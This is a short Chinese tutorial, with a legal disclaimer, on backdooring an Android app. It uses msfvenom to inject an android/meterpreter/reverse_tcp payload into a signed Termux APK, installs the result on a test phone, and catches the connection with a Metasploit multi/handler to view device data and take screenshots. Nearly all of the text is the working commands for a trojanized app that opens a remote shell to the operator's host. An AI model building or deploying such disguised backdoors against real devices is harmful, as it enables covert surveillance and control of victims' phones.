msfvenom生成apk后门,实现远程操控
声明:本文内容仅供网络安全学习与研究使用,请勿用于任何非法用途。作者对因使用本文内容而产生的任何直接或间接后果概不负责。请在合法合规的前提下进行测试,并确保已获得相关授权。
环境
- kali 2024.4(虚拟机,网络模式为桥接模式)
- apktool 2.11.1
- 测试手机:荣耀20S
步骤
- 下载一个简单且已经签名过的apk作为模板,我选择的是
termux(https://github.com/termux/termux-app/releases#release-v0.118.0),下载完成后重命名为template.apk
- 查看自己的虚拟机ip地址(必须是桥接模式,不能是NAT),然后进行注入,之后将生成的新的apk安装到手机上
msfvenom-pandroid/meterpreter/reverse_tcpLHOST=10.211.101.114LPORT=4444-xtemplate.apk-otest.apk- 开启
msfconsole,测试手机启动app,等待TCP连接成功
use exploit/multi/handlersetpayload android/meterpreter/reverse_tcpsetLHOST10.211.101.114setLPORT4444run- 尝试查看测试手机信息、截图等操作
